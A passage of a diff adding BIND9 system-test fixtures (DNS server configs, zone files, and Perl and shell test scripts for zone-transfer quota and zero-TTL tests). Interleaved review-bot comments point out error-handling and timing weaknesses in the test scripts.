* See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.1; + notify-source 10.53.0.1; + transfer-source 10.53.0.1; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.1; }; + listen-on-v6 { none; }; + recursion no; + notify yes; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.1 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +zone "." { + type primary; + file "root.db"; +}; + +zone "changing." { + type primary; + file "changing.db"; +}; + +include "zones.conf"; 
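Review bot: In xferquota/ns1/named.conf.in the `controls` statement accepts rndc connections from `allow { any; }` and authenticates them with the literal secret `1234abcd8765` in `key rndc_key`, and nothing in the file says that either is fixture-only. The listener is bound to 10.53.0.1, which the harness presumably sets up as a local test address, so the actual exposure depends on configuration outside this hunk. I would add a comment above the key, `/* Fixed test key; matches the rndc.conf used by the system-test harness. */`, so the value is not mistaken for a template when the file is copied.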
diff --git a/bin/tests/system/xferquota/ns1/root.db b/bin/tests/system/xferquota/ns1/root.db new file mode 100644 index 0000000..c5049f4 --- /dev/null +++ b/bin/tests/system/xferquota/ns1/root.db @@ -0,0 +1,29 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +. IN SOA gson.nominum.com. a.root.servers.nil. ( + 2000042100 ; serial + 600 ; refresh + 600 ; retry + 1200 ; expire + 600 ; minimum + ) +. NS a.root-servers.nil. +a.root-servers.nil. A 10.53.0.1 + +example. NS ns2.example. +ns2.example. A 10.53.0.2 + +changing. NS dns1.changing. + A 10.53.0.1 + NS dns2.changing. + A 10.53.0.2 diff --git a/bin/tests/system/xferquota/ns2/example.db b/bin/tests/system/xferquota/ns2/example.db new file mode 100644 index 0000000..e1d2b82 --- /dev/null +++ b/bin/tests/system/xferquota/ns2/example.db 
@@ -0,0 +1,146 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$ORIGIN . +$TTL 300 ; 5 minutes +example IN SOA mname1. . ( + 2000042795 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) +example. NS ns2.example. +ns2.example. A 10.53.0.2 +example. NS ns3.example. +ns3.example. A 10.53.0.3 + +$ORIGIN example. +* MX 10 mail +a TXT "foo foo foo" + PTR foo.net. +$TTL 3600 ; 1 hour +a01 A 0.0.0.0 +a02 A 255.255.255.255 +a601 AAAA ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff +afsdb01 AFSDB 0 hostname +afsdb02 AFSDB 65535 . +$TTL 300 ; 5 minutes +b CNAME foo.net. +c A 73.80.65.49 +$TTL 3600 ; 1 hour +cert01 CERT 65534 65535 PRIVATEOID ( + MxFcby9k/yvedMfQgKzhH5er0Mu/vILz45IkskceFGgi + WCn/GxHhai6VAuHAoNUz4YoU1tVfSCSqQYn6//11U6Nl + d80jEeC8aTrO+KKmCaY= ) +cname01 CNAME cname-target. +cname02 CNAME cname-target +cname03 CNAME . +$TTL 300 ; 5 minutes +d A 73.80.65.49 +$TTL 3600 ; 1 hour +dname01 DNAME dname-target. +dname02 DNAME dname-target +dname03 DNAME . 
+$TTL 300 ; 5 minutes +e MX 10 mail + TXT "one" + TXT "three" + TXT "two" + A 73.80.65.49 + A 73.80.65.50 + A 73.80.65.52 + A 73.80.65.51 +f A 73.80.65.52 +$TTL 3600 ; 1 hour +gpos01 GPOS "-22.6882" "116.8652" "250.0" +gpos02 GPOS "" "" "" +hinfo01 HINFO "Generic PC clone" "NetBSD-1.4" +hinfo02 HINFO "PC" "NetBSD" +isdn01 ISDN "isdn-address" +isdn02 ISDN "isdn-address" "subaddress" +isdn03 ISDN "isdn-address" +isdn04 ISDN "isdn-address" "subaddress" +dnskey01 DNSKEY 512 255 1 ( + AQMFD5raczCJHViKtLYhWGz8hMY9UGRuniJDBzC7w0aR + yzWZriO6i2odGWWQVucZqKVsENW91IOW4vqudngPZsY3 + GvQ/xVA8/7pyFj6b7Esga60zyGW6LFe9r8n6paHrlG5o + jqf0BaqHT+8= ) +kx01 KX 10 kdc +kx02 KX 10 . +loc01 LOC 60 9 0.000 N 24 39 0.000 E 10.00m 20m 2000m 20m +loc02 LOC 60 9 0.000 N 24 39 0.000 E 10.00m 20m 2000m 20m +mb01 MG madname +mb02 MG . +mg01 MG mgmname +mg02 MG . +minfo01 MINFO rmailbx emailbx +minfo02 MINFO . . +mr01 MR mrname +mr02 MR . +mx01 MX 10 mail +mx02 MX 10 . +naptr01 NAPTR 0 0 "" "" "" . +naptr02 NAPTR 65535 65535 "blurgh" "blorf" ":(.*):\\1:" foo. +nsap-ptr01 NSAP-PTR foo. + NSAP-PTR . +nsap01 NSAP 0x47000580005a0000000001e133ffffff00016100 +nsap02 NSAP 0x47000580005a0000000001e133ffffff00016100 +nsec01 NSEC a.secure ( NS SOA MX RRSIG DNSKEY LOC NSEC ) +nsec02 NSEC . ( NSAP-PTR NSEC ) +nsec03 NSEC . ( A ) +nsec04 NSEC . ( 127 ) +ptr01 PTR example. +px01 PX 65535 foo. bar. +px02 PX 65535 . . +rp01 RP mbox-dname txt-dname +rp02 RP . . +rt01 RT 0 intermediate-host +rt02 RT 65535 . +$TTL 300 ; 5 minutes +s NS ns.s +$ORIGIN s.example. +ns A 73.80.65.49 +$ORIGIN example. +$TTL 3600 ; 1 hour +rrsig01 RRSIG NSEC 1 3 3600 20000102030405 ( + 19961211100908 2143 foo + MxFcby9k/yvedMfQgKzhH5er0Mu/vILz45IkskceFGgi + WCn/GxHhai6VAuHAoNUz4YoU1tVfSCSqQYn6//11U6Nl + d80jEeC8aTrO+KKmCaY= ) +srv01 SRV 0 0 0 . +srv02 SRV 65535 65535 65535 old-slow-box.example.com. 
+$TTL 301 ; 5 minutes 1 second +t A 73.80.65.49 +$TTL 3600 ; 1 hour +txt01 TXT "foo" +txt02 TXT "foo" "bar" +txt03 TXT "foo" +txt04 TXT "foo" "bar" +txt05 TXT "foo bar" +txt06 TXT "foo bar" +txt07 TXT "foo bar" +txt08 TXT "foo\010bar" +txt09 TXT "foo\010bar" +txt10 TXT "foo bar" +txt11 TXT "\"foo\"" +txt12 TXT "\"foo\"" +$TTL 300 ; 5 minutes +u TXT "txt-not-in-nsec" +$ORIGIN u.example. +a A 73.80.65.49 +b A 73.80.65.49 +$ORIGIN example. +$TTL 3600 ; 1 hour +wks01 WKS 10.0.0.1 6 ( 0 1 2 21 23 ) +wks02 WKS 10.0.0.1 17 ( 0 1 2 53 ) +wks03 WKS 10.0.0.2 6 ( 65535 ) +x2501 X25 "123456789" diff --git a/bin/tests/system/xferquota/ns2/named.conf.in b/bin/tests/system/xferquota/ns2/named.conf.in new file mode 100644 index 0000000..ef55dc6 --- /dev/null +++ b/bin/tests/system/xferquota/ns2/named.conf.in @@ -0,0 +1,40 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.2; + notify-source 10.53.0.2; + transfer-source 10.53.0.2; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { none; }; + recursion no; + notify no; + + transfers-in 5; + transfers-per-ns 5; +}; + +zone "." { + type hint; + file "../../common/root.hint"; +}; + +zone "changing." { + type secondary; + primaries { 10.53.0.1; }; + file "changing.bk"; +}; + +include "zones.conf"; diff --git a/bin/tests/system/xferquota/setup.pl b/bin/tests/system/xferquota/setup.pl new file mode 100644 index 0000000..ab5450c --- /dev/null +++ b/bin/tests/system/xferquota/setup.pl 
@@ -0,0 +1,40 @@ +#!/usr/bin/perl + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# +# Set up test data for zone transfer quota tests. +# +use FileHandle; + +my $priconf = new FileHandle("ns1/zones.conf", "w") or die; +my $secconf = new FileHandle("ns2/zones.conf", "w") or die; + +for ($z = 0; $z < 300; $z++) { + my $zn = sprintf("zone%06d.example", $z); + print $priconf "zone \"$zn\" { type primary; file \"$zn.db\"; };\n"; + print $secconf "zone \"$zn\" { type secondary; file \"$zn.bk\"; masterfile-format text; primaries { 10.53.0.1; }; };\n"; + my $fn = "ns1/$zn.db"; + my $f = new FileHandle($fn, "w") or die "open: $fn: $!"; + print $f "\$TTL 300 +\@ IN SOA ns1 . 1 300 120 3600 86400 + NS ns1 + NS ns2 +ns1 A 10.53.0.1 +ns2 A 10.53.0.2 + MX 10 mail1.isp.example. + MX 20 mail2.isp.example. +www A 10.0.0.1 +xyzzy A 10.0.0.2 +"; + $f->close; +} diff --git a/bin/tests/system/xferquota/setup.sh b/bin/tests/system/xferquota/setup.sh new file mode 100644 index 0000000..c8c488d --- /dev/null +++ b/bin/tests/system/xferquota/setup.sh 
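Review bot: The two `zones.conf` opens end in a bare `or die`, so a failure prints only Perl's generic "Died at ..." message, while the per-zone open a few lines later reports the path and `$!`; they should match, e.g. `my $priconf = new FileHandle("ns1/zones.conf", "w") or die "open: ns1/zones.conf: $!";`. Neither config handle is closed explicitly and the result of `$f->close` is not checked, so a short write would go unnoticed until named fails to load a zone. The loop bound 300 is the same literal that xferquota/tests.sh compares its zone count against, which deserves a comment here, and `$z` is an undeclared global because the script does not `use strict`.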
@@ -0,0 +1,26 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# +# Set up test data for zone transfer quota tests. +# + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +$PERL setup.pl + +cp -f ns1/changing1.db ns1/changing.db + +copy_setports ns1/named.conf.in ns1/named.conf +copy_setports ns2/named.conf.in ns2/named.conf diff --git a/bin/tests/system/xferquota/tests.sh b/bin/tests/system/xferquota/tests.sh new file mode 100755 index 0000000..d6e0544 --- /dev/null +++ b/bin/tests/system/xferquota/tests.sh 
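Review bot: Nothing checks the exit status of `$PERL setup.pl`, and the script does not use `set -e`, so if the generator dies (it calls `die` on every failed open) setup still copies the configs and finishes normally, and the problem only shows up later as a timeout in tests.sh. `$PERL setup.pl || exit 1` would stop at the cause. The same holds for the `cp -f` line and the `copy_setports` calls; `copy_setports` is defined outside this hunk, presumably in conf.sh.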
@@ -0,0 +1,64 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +DIGOPTS="+tcp +noadd +nosea +nostat +noquest +nocomm +nocmd -p ${PORT}" +RNDCCMD="$RNDC -c $SYSTEMTESTTOP/common/rndc.conf -p ${CONTROLPORT} -s" + +# +# Perform tests +# + +count=0 +ticks=0 +while [ $count != 300 ]; do + if [ $ticks = 1 ]; then + echo_i "Changing test zone..." + cp -f ns1/changing2.db ns1/changing.db + if [ ! "$CYGWIN" ]; then + $KILL -HUP `cat ns1/named.pid` + else + rndc_reload ns1 10.53.0.1 + fi + fi + sleep 1 + ticks=`expr $ticks + 1` + seconds=`expr $ticks \* 1` + if [ $ticks = 360 ]; then + echo_i "Took too long to load zones" + exit 1 + fi + count=`cat ns2/zone*.bk | grep xyzzy | wc -l` + echo_i "Have $count zones up in $seconds seconds" +done + +status=0 + +$DIG $DIGOPTS zone000099.example. @10.53.0.1 axfr > dig.out.ns1 || status=1 + +$DIG $DIGOPTS zone000099.example. @10.53.0.2 axfr > dig.out.ns2 || status=1 + +digcomp dig.out.ns1 dig.out.ns2 || status=1 + +sleep 15 + +$DIG $DIGOPTS a.changing. @10.53.0.1 a > dig.out.ns1 || status=1 + +$DIG $DIGOPTS a.changing. @10.53.0.2 a > dig.out.ns2 || status=1 + +digcomp dig.out.ns1 dig.out.ns2 || status=1 + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/zero/ans5/ans.pl b/bin/tests/system/zero/ans5/ans.pl new file mode 100644 index 0000000..3ca1083 --- /dev/null +++ b/bin/tests/system/zero/ans5/ans.pl 
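Review bot: Both comparisons write to the same `dig.out.ns1` and `dig.out.ns2`, so the `a.changing.` queries overwrite the transfer output of `zone000099.example.` and a failure of the first `digcomp` leaves nothing to inspect; distinct names such as `dig.out.ns1.test1` and `dig.out.ns1.test2` would still be matched by the `rm -f dig.out.*` in clean.sh. The fixed `sleep 15` before the `a.changing.` check makes the result depend on how quickly the secondary refreshes; polling with an upper bound until the two answers agree would be less timing-sensitive (the xfer test earlier on this page uses `retry_quiet` for that, assuming conf.sh provides it here too). In the loading loop, `cat ns2/zone*.bk` runs before any backup file exists, so the unmatched glob prints an error on the first iterations; `2>/dev/null` on that `cat` would keep the test log clean.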
@@ -0,0 +1,81 @@ +#!/usr/bin/perl -w + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# +# Don't respond if the "norespond" file exists; otherwise respond to +# any A or AAAA query. +# + +use IO::File; +use IO::Socket; +use Net::DNS; +use Net::DNS::Packet; + +my $localport = int($ENV{'PORT'}); +if (!$localport) { $localport = 5300; } + +my $sock = IO::Socket::INET->new(LocalAddr => "10.53.0.5", + LocalPort => $localport, Proto => "udp") or die "$!"; + +my $pidf = new IO::File "ans.pid", "w" or die "cannot open pid file: $!"; +print $pidf "$$\n" or die "cannot write pid file: $!"; +$pidf->close or die "cannot close pid file: $!"; +sub rmpid { unlink "ans.pid"; exit 1; }; + +$SIG{INT} = \&rmpid; +$SIG{TERM} = \&rmpid; + +my $octet = 0; + +for (;;) { + $sock->recv($buf, 512); + + print "**** request from " , $sock->peerhost, " port ", $sock->peerport, "\n"; + + my $packet; + + if ($Net::DNS::VERSION > 0.68) { + $packet = new Net::DNS::Packet(\$buf, 0); + $@ and die $@; + } else { + my $err; + ($packet, $err) = new Net::DNS::Packet(\$buf, 0); + $err and die $err; + } + + print "REQUEST:\n"; + $packet->print; + + $packet->header->qr(1); + + my @questions = $packet->question; + my $qname = $questions[0]->qname; + my $qtype = $questions[0]->qtype; + + $packet->header->aa(1); + if ($qtype eq "A") { + $packet->push("answer", + new Net::DNS::RR($qname . + " 0 A 192.0.2." . $octet)); + $octet = $octet + 1; + } elsif ($qtype eq "AAAA") { + $packet->push("answer", + new Net::DNS::RR($qname . 
+ " 300 AAAA 2001:db8:beef::1")); + } + + $sock->send($packet->data); + print "RESPONSE:\n"; + $packet->print; + print "\n"; +} diff --git a/bin/tests/system/zero/clean.sh b/bin/tests/system/zero/clean.sh new file mode 100644 index 0000000..2ef5727 --- /dev/null +++ b/bin/tests/system/zero/clean.sh @@ -0,0 +1,22 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +rm -f */named.conf +rm -f */named.run +rm -f */named.memstats +rm -f ns2/example.db +rm -f ns4/example.bk +rm -f dig.out* +rm -f query.list +rm -f ns*/named.lock +rm -f ns*/managed-keys.bind* diff --git a/bin/tests/system/zero/ns1/named.conf.in b/bin/tests/system/zero/ns1/named.conf.in new file mode 100644 index 0000000..1334c85 --- /dev/null +++ b/bin/tests/system/zero/ns1/named.conf.in @@ -0,0 +1,29 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.1; + notify-source 10.53.0.1; + transfer-source 10.53.0.1; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.1; }; + listen-on-v6 { none; }; + recursion no; + dnssec-validation no; +}; + +zone "." { + type primary; + file "root.db"; +}; 
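Review bot: In zero/ans5/ans.pl, `$questions[0]->qname` is dereferenced without checking that the parsed packet has a question section, so a datagram with an empty question list ends the responder with a method call on an undefined value, and the two `die` calls after the `Net::DNS::Packet` parse do the same for any malformed datagram; for a fixture that has to stay up for the whole test, `next unless @questions;` and a logged `next` on parse errors would be more robust. The header comment says the script stays silent when a "norespond" file exists, but no statement in the hunk tests for that file, so either the check or the comment should go. `$octet` is appended to `192.0.2.` with no upper bound; `$octet = ($octet + 1) % 256;` keeps the generated address valid on long runs. The return value of `$sock->recv` is not checked either.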
diff --git a/bin/tests/system/zero/ns1/root.db b/bin/tests/system/zero/ns1/root.db
new file mode 100644
index 0000000..fbcb3e2
--- /dev/null
+++ b/bin/tests/system/zero/ns1/root.db
@@ -0,0 +1,26 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300
+@ SOA ns1. hostmaster.warn.example. (
+ 1 3600 1200 604800 3600 )
+ NS ns1.
+ns1. A 10.53.0.1
+;
+example. NS ns2.example.
+ns2.example. A 10.53.0.2
+example. NS ns4.example.
+ns4.example. A 10.53.0.4
+increment. NS incrementns.
+incrementns. A 10.53.0.5
+tld. NS ns2.tld.
+ns2.tld. A 10.53.0.2
+
diff --git a/bin/tests/system/zero/ns2/named.args b/bin/tests/system/zero/ns2/named.args
new file mode 100644
index 0000000..b20594e
--- /dev/null
+++ b/bin/tests/system/zero/ns2/named.args
@@ -0,0 +1 @@
+-m record,size,mctx -c named.conf -d 1 -D zero-ns2 -X named.lock -g -T maxcachesize=2097152
diff --git a/bin/tests/system/zero/ns2/named.conf.in b/bin/tests/system/zero/ns2/named.conf.in
new file mode 100644
index 0000000..751eafd
--- /dev/null
+++ b/bin/tests/system/zero/ns2/named.conf.in
@@ -0,0 +1,34 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ query-source address 10.53.0.2;
+ notify-source 10.53.0.2;
+ transfer-source 10.53.0.2;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.2; };
+ listen-on-v6 { none; };
+ recursion no;
+ dnssec-validation no;
+};
+
+zone "example" {
+ type primary;
+ file "example.db";
+};
+
+zone "tld" {
+ type primary;
+ file "tld.db";
+};
diff --git a/bin/tests/system/zero/ns2/tld.db b/bin/tests/system/zero/ns2/tld.db
new file mode 100644
index 0000000..0ffeb05
--- /dev/null
+++ b/bin/tests/system/zero/ns2/tld.db
@@ -0,0 +1,20 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 1
+@ 300 SOA ns2.tld. hostmaster.ns2.tld. 0 1 1 1 1
+@ 300 NS ns2.tld.
+ns2 300 A 10.53.0.2
+;
+; The TTL of these delegation records needs to 1.
+;
+one 1 NS ns4.one.tld.
+ns4.one 1 A 10.53.0.4
diff --git a/bin/tests/system/zero/ns3/named.args b/bin/tests/system/zero/ns3/named.args
new file mode 100644
index 0000000..9d89bd6
--- /dev/null
+++ b/bin/tests/system/zero/ns3/named.args
@@ -0,0 +1 @@
+-m record,size,mctx -c named.conf -d 1 -D zero-ns3 -X named.lock -g -T maxcachesize=2097152
diff --git a/bin/tests/system/zero/ns3/named.conf.in b/bin/tests/system/zero/ns3/named.conf.in
new file mode 100644
index 0000000..3492b9f
--- /dev/null
+++ b/bin/tests/system/zero/ns3/named.conf.in
@@ -0,0 +1,29 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ query-source address 10.53.0.3;
+ notify-source 10.53.0.3;
+ transfer-source 10.53.0.3;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.3; };
+ listen-on-v6 { none; };
+ recursion yes;
+ dnssec-validation yes;
+};
+
+zone "." {
+ type hint;
+ file "root.hint";
+};
diff --git a/bin/tests/system/zero/ns3/root.hint b/bin/tests/system/zero/ns3/root.hint
new file mode 100644
index 0000000..206e952
--- /dev/null
+++ b/bin/tests/system/zero/ns3/root.hint
@@ -0,0 +1,13 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+. NS ns1.
+ns1. A 10.53.0.1
diff --git a/bin/tests/system/zero/ns4/named.args b/bin/tests/system/zero/ns4/named.args
new file mode 100644
index 0000000..09d1fe0
--- /dev/null
+++ b/bin/tests/system/zero/ns4/named.args
@@ -0,0 +1 @@
+-m record,size,mctx -c named.conf -d 1 -D zero-ns4 -X named.lock -g -T maxcachesize=2097152
diff --git a/bin/tests/system/zero/ns4/named.conf.in b/bin/tests/system/zero/ns4/named.conf.in
new file mode 100644
index 0000000..fc8fec6
--- /dev/null
+++ b/bin/tests/system/zero/ns4/named.conf.in
@@ -0,0 +1,35 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ query-source address 10.53.0.4;
+ notify-source 10.53.0.4;
+ transfer-source 10.53.0.4;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.4; };
+ listen-on-v6 { none; };
+ recursion no;
+ dnssec-validation yes;
+};
+
+zone "example" {
+ type secondary;
+ primaries { 10.53.0.2; };
+ file "example.bk";
+};
+
+zone "one.tld" {
+ type primary;
+ file "one.tld.db";
+};
diff --git a/bin/tests/system/zero/ns4/one.tld.db b/bin/tests/system/zero/ns4/one.tld.db
new file mode 100644
index 0000000..491ba87
--- /dev/null
+++ b/bin/tests/system/zero/ns4/one.tld.db
@@ -0,0 +1,17 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 1
+; The TTL of all these records needs to be 1.
+@ 1 SOA ns4.one.tld. hostmaster.ns4.tld. 0 1 1 1 1
+@ 1 NS ns4.one.tld.
+ns4 1 A 10.53.0.4
+www 1 A 10.53.0.4
diff --git a/bin/tests/system/zero/prereq.sh b/bin/tests/system/zero/prereq.sh
new file mode 100644
index 0000000..ec369f8
--- /dev/null
+++ b/bin/tests/system/zero/prereq.sh
@@ -0,0 +1,23 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+SYSTEMTESTTOP=..
+. $SYSTEMTESTTOP/conf.sh
+
+if $PERL -e 'use Net::DNS;' 2>/dev/null
+then
+ :
+else
+ echo_i "This test requires the Net::DNS library." >&2
+ exit 1
+fi
diff --git a/bin/tests/system/zero/setup.sh b/bin/tests/system/zero/setup.sh
new file mode 100644
index 0000000..592034c
--- /dev/null
+++ b/bin/tests/system/zero/setup.sh
@@ -0,0 +1,22 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+SYSTEMTESTTOP=..
+. $SYSTEMTESTTOP/conf.sh
+
+copy_setports ns1/named.conf.in ns1/named.conf
+copy_setports ns2/named.conf.in ns2/named.conf
+copy_setports ns3/named.conf.in ns3/named.conf
+copy_setports ns4/named.conf.in ns4/named.conf
+
+$SHELL ../genzone.sh 2 4 | sed -e 's/^$TTL 3600$/$TTL 0 ; force TTL to zero/' -e 's/86400.IN SOA/0 SOA/' > ns2/example.db
diff --git a/bin/tests/system/zero/tests.sh b/bin/tests/system/zero/tests.sh
new file mode 100644
index 0000000..0449552
--- /dev/null
+++ b/bin/tests/system/zero/tests.sh
@@ -0,0 +1,122 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +#shellcheck source=conf.sh +SYSTEMTESTTOP=.. +. "$SYSTEMTESTTOP/conf.sh" + +dig_with_opts() { + "$DIG" -p "${PORT}" "$@" +} + +wait_for_pid() ( + for pid in "$@"; do + kill -0 "$pid" 2>/dev/null && return 1 + done + return 0 +) + +status=0 +n=0 + +n=$((n+1)) +echo_i "check lookups against TTL=0 records ($n)" +i=0 +ret=0 +passes=10 +dig_with_opts @10.53.0.2 axfr example | grep -v "^ds0" | \ +awk '$2 == "0" { print "-q", $1, $4; print "-q", "zzz"$1, $4;}' > query.list + +# add 1/5 second per query +timeout=$(($(wc -l < query.list) / 5)) +while [ $i -lt $passes ] +do + (dig_with_opts @10.53.0.3 -f query.list > "dig.out$i.1.test$n") & pid1="$!" + (dig_with_opts @10.53.0.3 -f query.list > "dig.out$i.2.test$n") & pid2="$!" + (dig_with_opts @10.53.0.3 -f query.list > "dig.out$i.3.test$n") & pid3="$!" + (dig_with_opts @10.53.0.3 -f query.list > "dig.out$i.4.test$n") & pid4="$!" + (dig_with_opts @10.53.0.3 -f query.list > "dig.out$i.5.test$n") & pid5="$!" + (dig_with_opts @10.53.0.3 -f query.list > "dig.out$i.6.test$n") & pid6="$!" 
